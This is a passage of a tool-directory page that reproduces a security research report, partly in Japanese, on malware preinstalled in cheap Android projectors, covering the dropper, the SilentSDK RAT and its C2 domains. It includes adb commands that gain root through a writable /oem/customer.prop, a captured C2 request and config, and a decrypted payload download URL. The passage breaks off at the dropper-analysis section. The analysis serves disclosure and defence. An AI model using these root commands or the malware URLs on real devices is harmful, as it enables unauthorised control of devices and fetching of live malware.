Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Android-Projector-C2-Malware — 中国のビーマーによるC2ネットワークの分析 - SilentSDK-Analysis | Kitploit
ツール/GitHubGitHub/kavan00/android-projector-c2-malware
Androidセキュリティ組み込みシステムセキュリティ侵害指標 (IOC) 管理IoTセキュリティネットワークフォレンジックリバースエンジニアリングマルウェア分析デジタルフォレンジックコマンド&コントロール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
脅威インテリジェンス
サプライチェーンセキュリティ
ファームウェア解析
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

中国のビーマーによるC2ネットワークの分析 - SilentSDK-Analysis

リポジトリを見る
182665ヶ月前未レビュー

AndroidプロジェクターにプリインストールされたC2インフラとRATペイロード

技術分析レポート — セキュリティ研究


影響を受けるデバイス: Nonete(例:モデルHY260Pro)などのビーマーブランドの複数のAndroidプロジェクター(Magcubic、Hotack、Huyukangなど多くのメーカーが同様のモデルを販売しており、これを裏付ける兆候があるため、これらのプロジェクターも影響を受ける可能性が高い)
チップセットプラットフォーム: Allwinner H713 / sun50iw12p1 — このプラットフォーム上のすべてのデバイスに影響を与える可能性がある
分析期間: 2026年4月11日~17日
分類: プリインストールされたコマンド&コントロールインフラとリモートアクセストロイのペイロード


TL;DR

  • 問題: 現在Amazon、eBay、AliExpressで大量に販売されている多数の安価なAndroidプロジェクター(Magcubic、Hotackなどのブランドで、Allwinner H713チップを搭載している可能性がある)が、工場出荷時にマルウェアに感染している(サプライチェーン攻撃。 "BADBOX"事例に類似)。
  • メカニズム: 一見無害なシステムアプリ("StoreOS")が偽装されたドロッパーとして機能する。バックグラウンドで「SilentSDK」というステージ2ドロッパーを完全にサイレントにダウンロードし、最大システム権限でインストールする。これにより、モジュール式でプラグインベースのアーキテクチャに対応したRATおよび可能性としてフィッシングフレームワークがインストールされる。
  • 危険性: マルウェアは中国(api.pixelpioneerss.com)へのC2接続を確立し、機密性の高いデバイスIDを抽出し、任意の追加悪意コードをルート権限でいつでもダウンロードして実行できる(chmod 777)。さらに、デバイスにはオープンなルートバックドアが存在する。
  • 即時緩和策: C2ドメイン(特に*.aodintech.com、api.pixelpioneerss.com、sta.smartinnovate.net)をネットワークレベルでブロックする必要がある。影響を受けるユーザーは、悪意のあるアプリがシステムに深く埋め込まれているため、ADBを介して手動で無効化することしかできない。

緊急のお知らせ

本レポートで文書化されたマルウェアインフラは、現在Amazon、eBay、AliExpressでエンドユーザーに大量販売されているAndroidプロジェクターにプリインストールされている。影響を受けるデバイスは、複数のブランド名(Hotack、Huyukang、Magcubic、Noneteなど)に及ぶ可能性がある。同一のC2インフラは、同一メーカーの他のデバイスでも独立して確認されている(セクション13参照)。 このパターンはBADBOX事例と一致する。


目次

  1. デバイスの特定
  2. 調査ワークフロー
  3. ルートアクセス — エクスプロイトパス
  4. C2サーバー応答 — 核心的証拠
  5. マルウェアエコシステムの概要
  6. StoreOS — ドロッパー分析(com.htc.storeos)
  7. EventUploadService — テレメトリ(com.htc.eventuploadservice)
  8. ExpandSDK — 広告インジェクション(com.htc.expandsdk)
  9. SilentSDK — ステージ2ドロッパー分析(com.hotack.silentsdk)
  10. マルウェア
  11. システムバックドア
  12. ネットワークフォレンジック
  13. デバイススプーフィング(ビルドフィンガープリントスプーフィング)
  14. 外部確認
  15. 侵害指標(IOC)
  16. MITRE ATT&CKマッピング
  17. 即時緩和策
  18. 出典

購入したデバイス: Amazonリンク - Nonete Mini Beamer 4K 1080P


1. デバイスの特定

プロパティ値
ブランド名Nonete HY260Pro(複数の企業が販売するモデル)
内部モデル名NT10
SoCAllwinner sun50iw12p1(ARM 32ビット)
オペレーティングシステムSpectraOS(Android 11、カーネル5.4.99)
実際のビルドフィンガープリントAllwinner/h713_tuna_p3/h713-tuna_p3:11
スプーフィングされたビルドフィンガープリントADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissive(強制なし)
プラットフォーム署名キー公開AOSPテストキー
OEM証明書CN=蓝鲨、OU=www.bsh.me、C=CN
ファームウェアチャンネルHY260Pro_SpectraOS_TPYB

範囲に関する注意: Allwinner H713チップセットは、欧州市場でブランド名を変えながら販売されている多数の安価なAndroidプロジェクターに組み込まれている。同一のファームウェアベース(h713_tuna_p3)と同一のC2オペレーター(Shenzhen Aodin Technology)は、このOEMの全デバイスが同一のインフラを含んでいることを強く示唆している。


2. 調査ワークフロー

ステップアクション結果
1Wiresharkによるネットワークトラフィックのキャプチャstore-api.aodintech.comへのHTTPトラフィック
2gzip圧縮されたC2応答のデコード7個のアプリ(隠しアプリ「SilentTools」を含む)
3AES-CBCによるダウンロードパスの復号鍵 [REDACTED]、.bppファイルへのURL
4/oem/customer.prop によるルートエクスプロイトプロパティ注入後 uid=0(root)
5/data、/oem、/system のフォレンジックダンプAPK、データベース、設定
6StoreOS DEXの静的解析pm install -r -d、バイトリバーサル保護
7reverseLenメカニズムのリバースエンジニアリングアンチ解析保護の理解
8バイトリバーサル保護の突破復号され解析可能なSilentSDK DEX
9SilentSDK文字列のXOR復号C2ドメイン api.pixelpioneerss.com 確認
103つのソースにわたるハッシュ検証MD5/SHA-256が完全一致
11マルウェアダウンロードプロセスのリバースエンジニアリングサーバーはまだオンライン
12マルウェアのリバースエンジニアリングプラグインベースのRATフレームワーク

3. ルートアクセス — エクスプロイトパス

ルートアクセスは3つの脆弱性の組み合わせによって達成された:

  1. SELinux Permissive — アクセス違反はログに記録されるだけでブロックされない。
  2. ワールド書き込み可能な/oem — パーティションはFATとしてfmask=0000でマウントされている。
  3. ブート時に読み込まれるcustomer.prop — システムプロパティを上書きする。```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**影響:** 物理的なアクセスを持つユーザー、または同一ネットワーク上の攻撃者(ADB経由、ポート5555が開いていて認証なし)が完全なルートアクセスを取得します。

---

## 4. C2サーバー応答 — 主要な証拠

### キャプチャされたHTTPリクエスト```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

サーバー応答(pcapngからデコード - テーブル)

gzip圧縮された応答には、7つのアプリを含むJSONリストが含まれています。そのうち6つは通常のストリーミングアプリ(YouTube、Netflix、Disney+、Prime Video、Chrome、BrowseHere)です。7つ目はSilentToolsです。

アプリパッケージ表示強制サイレントインストールサイレントアンインストール起動タイプ
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1

SilentToolsの設定詳細```json

{ "name": "SilentTools", "pkg": "com.hotack.silentsdk", "desc": "Special app", "icon": "http://cdn-store.aodintech.com/com.hotack.silentsdk/image/95630a5e-e05e-4dba-814a-cf2742585b39.png", "category": "htc", "zone": "Global", "developer": "htc", "isForce": true, "verCode": 4, "verName": "2509041614", "verDesc": "SilentSDK", "installType": 0, "appType": "apk", "reverseLen": 63995, "path": "W15UOdzUbX72/67VLbV2cMLetfnsudxCpedAqw2GjJ8pvLI56S0gTzrp4HaetoVK3PdHXvM9vw7g+F4eFGhHDNvARfeM38tkcqo7gOpulNCb1gKYE2rmjWa+6RdjhB84+g403UUicBfFf5vHDoOEgA==", "size": 2474873, "md5": "5df097591d6942bae4eff33a37c4e28f", "upDate": "2025-09-04", "isShow": false, "isSilentInstall": false, "isSilentUninstall": true, "isBootStartup": false, "launchType": 1, "launchParam": "com.hotack.silentsdk.MyService" }

**Interpretation of the flags:**

- `isShow: false` — The app does not appear in the store interface.
- `isForce: true` — Presumably forces the action (installation or update).
- `isSilentUninstall: true` — Can uninstall itself without user interaction.
- `launchType: 1` — Automatically starts the background service.
- `launchParam: MyService` — Reference to the persistent service.
- `zone: "Global"` — Targets all devices worldwide.
- `reverseLen` — Byte length needed to restore the SilentSDK `.apk`.

### Encrypted Download Path

The `path` field is AES-CBC encrypted:

- **Key/IV:** `[REDACTED]` (AES-CBC, Raw) -> The ChannelID of the device.
- **Decrypted result:**```text
http://cdn-store.aodintech.com/com.hotack.silentsdk/package/091acbf1-68b1-40f1-b9b7-7d4d6ae86880.bpp

注: ここではファイル拡張子.bppがファイアウォールを回避するために使用され、実行時に.apkにリネームされる可能性があります。このキャプチャではisSilentInstallフィールドはfalseです。isForce: trueの正確な意味は、デコンパイルされたコードから明確に復元できませんでした。この値がサーバーサイドで動的にtrueに設定される可能性は否定できません。


5. マルウェアエコシステムの概要

このデバイスには、4つの連携するシステムアプリが含まれており、すべてAOSPテストキーで署名され、UID 1000(System)で実行されています。```text ┌──────────────┐ │ DEVICE BOOT │ └──────┬───────┘ ┌────────────────┼────────────────┐ ▼ ▼ ▼ ┌─────────────┐ ┌─────────────┐ ┌──────────────┐ │ StoreOS │ │ SilentSDK │ │ EventUpload │ │ DROPPER │ │ RAT │ │ HEARTBEAT │ └──────┬──────┘ └──────┬──────┘ └──────┬───────┘ ▼ ▼ ▼ store-api. api.pixel event-api. aodintech.com pioneerss.com aodintech.com

   + ExpandSDK (Ad-Injection)
     → pb-api.aodintech.com
---

## 6. StoreOS — ドロッパー分析
ツールをダウンロード